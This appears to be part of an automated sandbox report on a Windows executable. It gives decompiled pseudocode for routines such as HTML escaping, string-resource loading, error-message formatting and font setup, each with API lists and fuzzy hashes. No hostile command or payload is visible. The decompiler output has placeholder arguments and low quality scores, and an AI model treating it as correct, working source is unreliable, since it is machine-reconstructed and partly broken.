                                                                                                                                                      				_v592 = __ecx;
                                                                                                                                                      				_v584 = 0;
                                                                                                                                                      				_v582 = 0;
                                                                                                                                                      				_v580 = 0;
                                                                                                                                                      				_v588 = 0x40f634;
                                                                                                                                                      				_t73 = memset( &_v584, 0, 0x44);
                                                                                                                                                      				_t126 =  *0x41235c; // 0x0
                                                                                                                                                      				_t151 = _a4;
                                                                                                                                                      				_t74 = _t73 | 0xffffffff;
                                                                                                                                                      				_t156 = (_t153 & 0xfffffff8) - 0x254 + 0xc;
                                                                                                                                                      				_v572 = _t74;
                                                                                                                                                      				_v568 = _t74;
                                                                                                                                                      				_v564 = _t74;
                                                                                                                                                      				_v560 = _t74;
                                                                                                                                                      				_t127 = _t126 - 1;
                                                                                                                                                      				_v520 = 0;
                                                                                                                                                      				_v600 =  *((intOrPtr*)(_t151 + 0x28));
                                                                                                                                                      				if(_t127 < 0) {
                                                                                                                                                      					L3:
                                                                                                                                                      					_t127 = _t127 | 0xffffffff;
                                                                                                                                                      				} else {
                                                                                                                                                      					while(1) {
                                                                                                                                                      						_t124 = wcscmp(_v600, E00406306(0x412340, _t127));
                                                                                                                                                      						_pop(_t134);
                                                                                                                                                      						if(_t124 == 0) {
                                                                                                                                                      							goto L4;
                                                                                                                                                      						}
                                                                                                                                                      						_t127 = _t127 - 1;
                                                                                                                                                      						if(_t127 >= 0) {
                                                                                                                                                      							continue;
                                                                                                                                                      						} else {
                                                                                                                                                      							goto L3;
                                                                                                                                                      						}
                                                                                                                                                      						goto L4;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				L4:
                                                                                                                                                      				if(_t127 != 0xffffffff) {
                                                                                                                                                      					_t76 = _t127;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t76 = E00406264(0x412340, _t134, _v600);
                                                                                                                                                      				}
                                                                                                                                                      				_v556 = _t76;
                                                                                                                                                      				_v524 =  *((intOrPtr*)(_t151 + 0x2c));
                                                                                                                                                      				_v548 =  *_t151;
                                                                                                                                                      				_v544 =  *((intOrPtr*)(_t151 + 4));
                                                                                                                                                      				_v540 =  *((intOrPtr*)(_t151 + 8));
                                                                                                                                                      				_v536 =  *((intOrPtr*)(_t151 + 0xc));
                                                                                                                                                      				_v532 =  *((intOrPtr*)(_t151 + 0x10));
                                                                                                                                                      				_t129 = _v592 + 0x84c;
                                                                                                                                                      				_v528 =  *((intOrPtr*)(_t151 + 0x14));
                                                                                                                                                      				_v596 = _v592 + 0x84c;
                                                                                                                                                      				E00406434(_v592 + 0x84c,  *((intOrPtr*)(_t151 + 0x20)), 0xffffffff, 0);
                                                                                                                                                      				_v580 = E00406264(0x412320, _t134, E0040636E(_t129));
                                                                                                                                                      				E00406434(_t129,  *((intOrPtr*)(_t151 + 0x24)), 0xffffffff, 0);
                                                                                                                                                      				_v592 = E00406264(0x412320, _t134, E0040636E(_t129));
                                                                                                                                                      				_t131 = _v624 + 0x860;
                                                                                                                                                      				 *((intOrPtr*)(_t131 + 0x1c)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t131 + 4)) = 0;
                                                                                                                                                      				_v632 = 0;
                                                                                                                                                      				_v548 = 0;
                                                                                                                                                      				memset( &_v546, 0, 0x1fe);
                                                                                                                                                      				_t97 = E0040610D(_t134,  &_v632,  &_v548, 0xff,  *((intOrPtr*)(_t151 + 0x1c)), ".", 0);
                                                                                                                                                      				_t157 = _t156 + 0x20;
                                                                                                                                                      				while(_t97 != 0) {
                                                                                                                                                      					E00406264(_t131, _t134,  &_v516);
                                                                                                                                                      					_t97 = E0040610D(_t134,  &_v604,  &_v520, 0xff,  *((intOrPtr*)(_t151 + 0x1c)), ".", 0);
                                                                                                                                                      					_t157 = _t157 + 0x14;
                                                                                                                                                      				}
                                                                                                                                                      				E0040637A(_t97 | 0xffffffff, _v596, 0x40f454);
                                                                                                                                                      				_t104 = _v596;
                                                                                                                                                      				_v604 = _v604 & 0x00000000;
                                                                                                                                                      				if( *((intOrPtr*)(_t104 + 0x87c)) > 0) {
                                                                                                                                                      					do {
                                                                                                                                                      						if(_v600 != 0) {
                                                                                                                                                      							_t166 = _t104 | 0xffffffff;
                                                                                                                                                      							E004063DD(_t104 | 0xffffffff, _t134, _v596, _t104 | 0xffffffff, ".");
                                                                                                                                                      						}
                                                                                                                                                      						E004063DD(E00406306(_t131,  *((intOrPtr*)(_v592 + 0x87c)) - _v600 - 1) | 0xffffffff,  *((intOrPtr*)(_v592 + 0x87c)) - _v600 - 1, _v596, _t166, _t116);
                                                                                                                                                      						_v604 = _v604 + 1;
                                                                                                                                                      						_t104 = _v596;
                                                                                                                                                      						_t134 = _v604;
                                                                                                                                                      					} while (_v604 <  *((intOrPtr*)(_t104 + 0x87c)));
                                                                                                                                                      				}
                                                                                                                                                      				_v576 = E00406264(0x412320, _t134, E0040636E(_v596));
                                                                                                                                                      				_v576 = E00406264(0x412320, _t134,  *((intOrPtr*)(_t151 + 0x18)));
                                                                                                                                                      				return E00408603( &(_v600[0xffffffffffffff2d]),  &_v596, _t134);
                                                                                                                                                      			}

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$wcscmp
                                                                                                                                                      • String ID: #A$ #A$ #A$@#A$@#A
                                                                                                                                                      • API String ID: 243296809-3329557610
                                                                                                                                                      • Opcode ID: 22725e31c05f3c2c753fedfd645125ca20493b01ca7e0e87f454b40cccc93761
                                                                                                                                                      • Instruction ID: dbc7ccb7a4322fbd292e3ccaf68edd9f7786ca1a27a33b966897527a52c99039
                                                                                                                                                      • Opcode Fuzzy Hash: 22725e31c05f3c2c753fedfd645125ca20493b01ca7e0e87f454b40cccc93761
                                                                                                                                                      • Instruction Fuzzy Hash: D2612D715083419FC310EF6AC981A1BB7E4AF88324F108A3EF5A9E72E1D779D4158B5A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 16%
                                                                                                                                                      			E0040DBDA(signed short* __eax, void* __ecx) {
                                                                                                                                                      				void* _t2;
                                                                                                                                                      				signed short* _t3;
                                                                                                                                                      				void* _t7;
                                                                                                                                                      				void* _t8;
                                                                                                                                                      				void* _t10;
                                                                                                                                                      
                                                                                                                                                      				_t3 = __eax;
                                                                                                                                                      				_t8 = __ecx;
                                                                                                                                                      				_t7 = 8;
                                                                                                                                                      				while(1) {
                                                                                                                                                      					_t2 =  *_t3 & 0x0000ffff;
                                                                                                                                                      					if(_t2 != 0x3c) {
                                                                                                                                                      						goto L3;
                                                                                                                                                      					}
                                                                                                                                                      					_push(_t7);
                                                                                                                                                      					_push(L"&lt;");
                                                                                                                                                      					L14:
                                                                                                                                                      					_t2 = memcpy(_t8, ??, ??);
                                                                                                                                                      					_t10 = _t10 + 0xc;
                                                                                                                                                      					_t8 = _t8 + _t7;
                                                                                                                                                      					L16:
                                                                                                                                                      					if( *_t3 != 0) {
                                                                                                                                                      						_t3 =  &(_t3[1]);
                                                                                                                                                      						continue;
                                                                                                                                                      					}
                                                                                                                                                      					return _t2;
                                                                                                                                                      					L3:
                                                                                                                                                      					if(_t2 != 0x3e) {
                                                                                                                                                      						if(_t2 != 0x22) {
                                                                                                                                                      							if((_t2 & 0x0000ffff) != 0xffffffb0) {
                                                                                                                                                      								if(_t2 != 0x26) {
                                                                                                                                                      									if(_t2 != 0xa) {
                                                                                                                                                      										 *_t8 = _t2;
                                                                                                                                                      										_t8 = _t8 + 2;
                                                                                                                                                      									} else {
                                                                                                                                                      										_push(_t7);
                                                                                                                                                      										_push(L"<br>");
                                                                                                                                                      										goto L14;
                                                                                                                                                      									}
                                                                                                                                                      								} else {
                                                                                                                                                      									_push(0xa);
                                                                                                                                                      									_push(L"&amp;");
                                                                                                                                                      									goto L11;
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								_push(0xa);
                                                                                                                                                      								_push(L"&deg;");
                                                                                                                                                      								L11:
                                                                                                                                                      								_t2 = memcpy(_t8, ??, ??);
                                                                                                                                                      								_t10 = _t10 + 0xc;
                                                                                                                                                      								_t8 = _t8 + 0xa;
                                                                                                                                                      							}
                                                                                                                                                      						} else {
                                                                                                                                                      							_t2 = memcpy(_t8, L"&quot;", 0xc);
                                                                                                                                                      							_t10 = _t10 + 0xc;
                                                                                                                                                      							_t8 = _t8 + 0xc;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_push(_t7);
                                                                                                                                                      						_push(L"&gt;");
                                                                                                                                                      						goto L14;
                                                                                                                                                      					}
                                                                                                                                                      					goto L16;
                                                                                                                                                      				}
                                                                                                                                                      			}

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy
                                                                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                                                                      • Opcode ID: e515d9530c1f27c32394133f4687b1e06294851c867495ee72b8dfb23976abf6
                                                                                                                                                      • Instruction ID: 0c92722b5564fee70601bedc3038ef5bb71485c7004a8157c6d80a0c5a0d985f
                                                                                                                                                      • Opcode Fuzzy Hash: e515d9530c1f27c32394133f4687b1e06294851c867495ee72b8dfb23976abf6
                                                                                                                                                      • Instruction Fuzzy Hash: E001C0A2E6826061FA3021968C86FBA15549BA2B10FA0013BB986352C6D1FD09CFC15F
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 59%
                                                                                                                                                      			E00406827(signed short __ebx) {
                                                                                                                                                      				signed int _t21;
                                                                                                                                                      				void* _t22;
                                                                                                                                                      				intOrPtr _t23;
                                                                                                                                                      				struct HINSTANCE__* _t25;
                                                                                                                                                      				signed int _t27;
                                                                                                                                                      				signed int _t30;
                                                                                                                                                      				signed int _t31;
                                                                                                                                                      				signed int _t32;
                                                                                                                                                      				void* _t35;
                                                                                                                                                      				signed short _t39;
                                                                                                                                                      				signed int _t40;
                                                                                                                                                      				signed int _t42;
                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                      				signed int _t44;
                                                                                                                                                      				intOrPtr _t45;
                                                                                                                                                      				intOrPtr _t46;
                                                                                                                                                      				intOrPtr _t49;
                                                                                                                                                      				intOrPtr _t52;
                                                                                                                                                      				intOrPtr _t53;
                                                                                                                                                      				intOrPtr _t54;
                                                                                                                                                      				intOrPtr _t55;
                                                                                                                                                      				void* _t57;
                                                                                                                                                      				int _t61;
                                                                                                                                                      				void* _t62;
                                                                                                                                                      				int _t71;
                                                                                                                                                      				void* _t72;
                                                                                                                                                      				void* _t73;
                                                                                                                                                      
                                                                                                                                                      				_t39 = __ebx;
                                                                                                                                                      				if( *0x413288 == 0) {
                                                                                                                                                      					E00406785();
                                                                                                                                                      				}
                                                                                                                                                      				_t40 =  *0x413280; // 0x18
                                                                                                                                                      				_t21 = 0;
                                                                                                                                                      				if(_t40 <= 0) {
                                                                                                                                                      					L5:
                                                                                                                                                      					_t57 = 0;
                                                                                                                                                      				} else {
                                                                                                                                                      					while(1) {
                                                                                                                                                      						_t55 =  *0x413278; // 0x9a7120
                                                                                                                                                      						if(_t39 ==  *((intOrPtr*)(_t55 + _t21 * 4))) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						_t21 = _t21 + 1;
                                                                                                                                                      						if(_t21 < _t40) {
                                                                                                                                                      							continue;
                                                                                                                                                      						} else {
                                                                                                                                                      							goto L5;
                                                                                                                                                      						}
                                                                                                                                                      						goto L6;
                                                                                                                                                      					}
                                                                                                                                                      					_t52 =  *0x41327c; // 0x9a7528
                                                                                                                                                      					_t53 =  *0x413270; // 0x2150048
                                                                                                                                                      					_t57 = _t53 +  *(_t52 + _t21 * 4) * 2;
                                                                                                                                                      				}
                                                                                                                                                      				L6:
                                                                                                                                                      				if(_t57 != 0) {
                                                                                                                                                      					L21:
                                                                                                                                                      					_t22 = _t57;
                                                                                                                                                      				} else {
                                                                                                                                                      					if((_t39 & 0x00010000) == 0) {
                                                                                                                                                      						if( *0x412c38 == 0) {
                                                                                                                                                      							_t23 =  *0x413290; // 0x1000
                                                                                                                                                      							_push(_t23 - 1);
                                                                                                                                                      							_push( *0x413274);
                                                                                                                                                      							_push(_t39);
                                                                                                                                                      							_t25 = E0040698D();
                                                                                                                                                      							goto L15;
                                                                                                                                                      						} else {
                                                                                                                                                      							wcscpy(0x412e48, L"strings");
                                                                                                                                                      							_t35 = E00406D16(_t39,  *0x413274);
                                                                                                                                                      							_t62 = _t62 + 0x10;
                                                                                                                                                      							if(_t35 == 0) {
                                                                                                                                                      								L13:
                                                                                                                                                      								_t25 = GetModuleHandleW(0);
                                                                                                                                                      								_t46 =  *0x413290; // 0x1000
                                                                                                                                                      								_push(_t46 - 1);
                                                                                                                                                      								_push( *0x413274);
                                                                                                                                                      								_push(_t39);
                                                                                                                                                      								goto L15;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t61 = wcslen( *0x413274);
                                                                                                                                                      								if(_t61 == 0) {
                                                                                                                                                      									goto L13;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_t25 = GetModuleHandleW(_t57);
                                                                                                                                                      						_t49 =  *0x413290; // 0x1000
                                                                                                                                                      						_push(_t49 - 1);
                                                                                                                                                      						_push( *0x413274);
                                                                                                                                                      						_push(_t39 & 0x0000ffff);
                                                                                                                                                      						L15:
                                                                                                                                                      						_t61 = LoadStringW(_t25, ??, ??, ??);
                                                                                                                                                      						_t71 = _t61;
                                                                                                                                                      					}
                                                                                                                                                      					if(_t71 <= 0) {
                                                                                                                                                      						L20:
                                                                                                                                                      						_t22 = 0x40f454;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t27 =  *0x413284; // 0xcd
                                                                                                                                                      						_t10 = _t61 + 2; // 0xcf
                                                                                                                                                      						_t72 = _t27 + _t10 -  *0x413288; // 0x8000
                                                                                                                                                      						if(_t72 >= 0) {
                                                                                                                                                      							goto L20;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t42 =  *0x413280; // 0x18
                                                                                                                                                      							_t73 = _t42 -  *0x41328c; // 0x100
                                                                                                                                                      							if(_t73 >= 0) {
                                                                                                                                                      								goto L20;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t43 =  *0x413270; // 0x2150048
                                                                                                                                                      								_t57 = _t43 + _t27 * 2;
                                                                                                                                                      								_t14 = _t61 + 2; // 0x2
                                                                                                                                                      								memcpy(_t57,  *0x413274, _t61 + _t14);
                                                                                                                                                      								_t30 =  *0x413280; // 0x18
                                                                                                                                                      								_t44 =  *0x413284; // 0xcd
                                                                                                                                                      								_t54 =  *0x41327c; // 0x9a7528
                                                                                                                                                      								 *(_t54 + _t30 * 4) = _t44;
                                                                                                                                                      								_t31 =  *0x413280; // 0x18
                                                                                                                                                      								_t45 =  *0x413278; // 0x9a7120
                                                                                                                                                      								 *(_t45 + _t31 * 4) = _t39;
                                                                                                                                                      								_t32 =  *0x413284; // 0xcd
                                                                                                                                                      								 *0x413280 =  *0x413280 + 1;
                                                                                                                                                      								 *0x413284 = _t32 + _t61 + 1;
                                                                                                                                                      								if(_t57 != 0) {
                                                                                                                                                      									goto L21;
                                                                                                                                                      								} else {
                                                                                                                                                      									goto L20;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t22;
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                      • wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                        • Part of subcall function 00406D16: memset.MSVCRT ref: 00406D29
                                                                                                                                                        • Part of subcall function 00406D16: _itow.MSVCRT ref: 00406D37
                                                                                                                                                      • wcslen.MSVCRT ref: 004068C6
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                      • LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                      • memcpy.MSVCRT ref: 0040693F
                                                                                                                                                        • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067BF
                                                                                                                                                        • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067DD
                                                                                                                                                        • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067FB
                                                                                                                                                        • Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 00406819
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                      • String ID: strings
                                                                                                                                                      • API String ID: 3166385802-3030018805
                                                                                                                                                      • Opcode ID: c72559ebadd3ea1b83e8afb84d1d37b4e66ec646cef112fd2340ea135da12479
                                                                                                                                                      • Instruction ID: b83127d2a15bee255c74f42c5a27ad94469461630f4946f0f4b43b8e5d041769
                                                                                                                                                      • Opcode Fuzzy Hash: c72559ebadd3ea1b83e8afb84d1d37b4e66ec646cef112fd2340ea135da12479
                                                                                                                                                      • Instruction Fuzzy Hash: 1641B375200102AFDB14FF18ED849B673A1F754306711C1FEE806B76A1DB7AAA22CB5C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                                      			E00406050(short* __ebx, intOrPtr _a4) {
                                                                                                                                                      				int _v8;
                                                                                                                                                      				char _v12;
                                                                                                                                                      				void _v2058;
                                                                                                                                                      				void _v2060;
                                                                                                                                                      				int _t35;
                                                                                                                                                      				int _t41;
                                                                                                                                                      				signed int _t48;
                                                                                                                                                      				signed int _t49;
                                                                                                                                                      				signed short* _t50;
                                                                                                                                                      				void** _t52;
                                                                                                                                                      				void* _t53;
                                                                                                                                                      				void* _t54;
                                                                                                                                                      
                                                                                                                                                      				_t48 = 0;
                                                                                                                                                      				_v2060 = 0;
                                                                                                                                                      				memset( &_v2058, 0, 0x7fe);
                                                                                                                                                      				_t54 = _t53 + 0xc;
                                                                                                                                                      				 *__ebx = 0;
                                                                                                                                                      				_t52 = _a4 + 4;
                                                                                                                                                      				_v12 = 8;
                                                                                                                                                      				do {
                                                                                                                                                      					_push( *_t52);
                                                                                                                                                      					_push( *((intOrPtr*)(_t52 - 4)));
                                                                                                                                                      					_push(L"%s (%s)");
                                                                                                                                                      					_push(0x400);
                                                                                                                                                      					_push( &_v2060);
                                                                                                                                                      					L0040DFD6();
                                                                                                                                                      					_t35 = wcslen( &_v2060);
                                                                                                                                                      					_v8 = _t35;
                                                                                                                                                      					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
                                                                                                                                                      					_t49 = _t48 + _v8 + 1;
                                                                                                                                                      					_t41 = wcslen( *_t52);
                                                                                                                                                      					_v8 = _t41;
                                                                                                                                                      					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
                                                                                                                                                      					_t54 = _t54 + 0x34;
                                                                                                                                                      					_t52 =  &(_t52[2]);
                                                                                                                                                      					_t23 =  &_v12;
                                                                                                                                                      					 *_t23 = _v12 - 1;
                                                                                                                                                      					_t48 = _t49 + _v8 + 1;
                                                                                                                                                      				} while ( *_t23 != 0);
                                                                                                                                                      				_t50 = __ebx + _t48 * 2;
                                                                                                                                                      				 *_t50 =  *_t50 & 0x00000000;
                                                                                                                                                      				_t50[1] = _t50[1] & 0x00000000;
                                                                                                                                                      				return __ebx;
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                      • String ID: %s (%s)
                                                                                                                                                      • API String ID: 3979103747-1363028141
                                                                                                                                                      • Opcode ID: 30fd9e651f075bdc212a63d8535efddc7708ae92d198bbf9a9235320ecc61d8a
                                                                                                                                                      • Instruction ID: f719391f3769af673f645ccb22e5d53aea3ed69308020c87343d88254f0aea6b
                                                                                                                                                      • Opcode Fuzzy Hash: 30fd9e651f075bdc212a63d8535efddc7708ae92d198bbf9a9235320ecc61d8a
                                                                                                                                                      • Instruction Fuzzy Hash: 27119072800119EBCF20DF95CC45ECAB7F9FF00308F1144BAE944B7152EBB5A6588B94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                                      			E00406F88(void* __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                      				void _v514;
                                                                                                                                                      				short _v516;
                                                                                                                                                      				void _v8710;
                                                                                                                                                      				short _v8712;
                                                                                                                                                      				int _t17;
                                                                                                                                                      				WCHAR* _t26;
                                                                                                                                                      
                                                                                                                                                      				E0040E340(0x2204, __ecx);
                                                                                                                                                      				_v8712 = 0;
                                                                                                                                                      				memset( &_v8710, 0, 0x2000);
                                                                                                                                                      				_t17 = GetDlgCtrlID(_a4);
                                                                                                                                                      				_t34 = _t17;
                                                                                                                                                      				GetWindowTextW(_a4,  &_v8712, 0x1000);
                                                                                                                                                      				if(_t17 > 0 && _v8712 != 0) {
                                                                                                                                                      					_v516 = 0;
                                                                                                                                                      					memset( &_v514, 0, 0x1fe);
                                                                                                                                                      					GetClassNameW(_a4,  &_v516, 0xff);
                                                                                                                                                      					_t26 =  &_v516;
                                                                                                                                                      					_push(L"sysdatetimepick32");
                                                                                                                                                      					_push(_t26);
                                                                                                                                                      					L0040E03E();
                                                                                                                                                      					if(_t26 != 0) {
                                                                                                                                                      						E00406E5E(_t34,  &_v8712);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return 1;
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                      • String ID: sysdatetimepick32
                                                                                                                                                      • API String ID: 1028950076-4169760276
                                                                                                                                                      • Opcode ID: 9d19a4fbb2cd0ec1623eaacac27ee37a612a64ef46b18b0cb24cdd6c82670a9a
                                                                                                                                                      • Instruction ID: 57a1b33134393eb8e1d887e85ad6c32cde466d51f9494c9a374c65f7fd7f5279
                                                                                                                                                      • Opcode Fuzzy Hash: 9d19a4fbb2cd0ec1623eaacac27ee37a612a64ef46b18b0cb24cdd6c82670a9a
                                                                                                                                                      • Instruction Fuzzy Hash: 0C11A7329042197ADB24EF91DD49A9B7B7CEF04750F0040BAF508E2091E7755A55CB99
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E004052B3(long __edi, wchar_t* _a4) {
                                                                                                                                                      				short _v8;
                                                                                                                                                      				void* _t8;
                                                                                                                                                      				void* _t10;
                                                                                                                                                      				long _t14;
                                                                                                                                                      				long _t24;
                                                                                                                                                      
                                                                                                                                                      				_t24 = __edi;
                                                                                                                                                      				_t8 = 0;
                                                                                                                                                      				_t14 = 0x1100;
                                                                                                                                                      				if(__edi - 0x834 <= 0x383) {
                                                                                                                                                      					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
                                                                                                                                                      					if(0 != 0) {
                                                                                                                                                      						_t14 = 0x1900;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                                                                                                                      					_t10 = wcscpy(_a4, 0x40f454);
                                                                                                                                                      				} else {
                                                                                                                                                      					if(wcslen(_v8) < 0x400) {
                                                                                                                                                      						wcscpy(_a4, _v8);
                                                                                                                                                      					}
                                                                                                                                                      					_t10 = LocalFree(_v8);
                                                                                                                                                      				}
                                                                                                                                                      				return _t10;
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004053D9,?,00000000,?,004097E7,00000000,?,?,00000001), ref: 004052D8
                                                                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004053D9,?,00000000,?,004097E7), ref: 004052F6
                                                                                                                                                      • wcslen.MSVCRT ref: 00405303
                                                                                                                                                      • wcscpy.MSVCRT ref: 00405313
                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004053D9,?,00000000,?,004097E7,00000000), ref: 0040531D
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040532D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                      • String ID: netmsg.dll
                                                                                                                                                      • API String ID: 2767993716-3706735626
                                                                                                                                                      • Opcode ID: cf43997b40231719751c74f47c5e443f472dd436546a9e994edbce1860f8f999
                                                                                                                                                      • Instruction ID: 17948da3eb349c1f06e63398449681b55ea015706cd50f91573ee618f1a58307
                                                                                                                                                      • Opcode Fuzzy Hash: cf43997b40231719751c74f47c5e443f472dd436546a9e994edbce1860f8f999
                                                                                                                                                      • Instruction Fuzzy Hash: 3101D431501114BAE7242791EC0AF9F7B68DF047A5B20043AF902B40D2DA756E10CA9C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E0040103E(void* __esi, void* __eflags) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				struct tagLOGFONTW _v100;
                                                                                                                                                      				signed int _t14;
                                                                                                                                                      				int _t21;
                                                                                                                                                      				long _t22;
                                                                                                                                                      				signed int _t25;
                                                                                                                                                      				struct HDC__* _t27;
                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                      
                                                                                                                                                      				_t27 = GetDC(0);
                                                                                                                                                      				_t14 = GetDeviceCaps(_t27, 0x5a);
                                                                                                                                                      				_t25 = 0x60;
                                                                                                                                                      				asm("cdq");
                                                                                                                                                      				_v8 = _t14 * 0xe / _t25;
                                                                                                                                                      				ReleaseDC(0, _t27);
                                                                                                                                                      				E00405833( &_v100, L"MS Sans Serif", _v8, 1);
                                                                                                                                                      				_t21 = CreateFontIndirectW( &_v100);
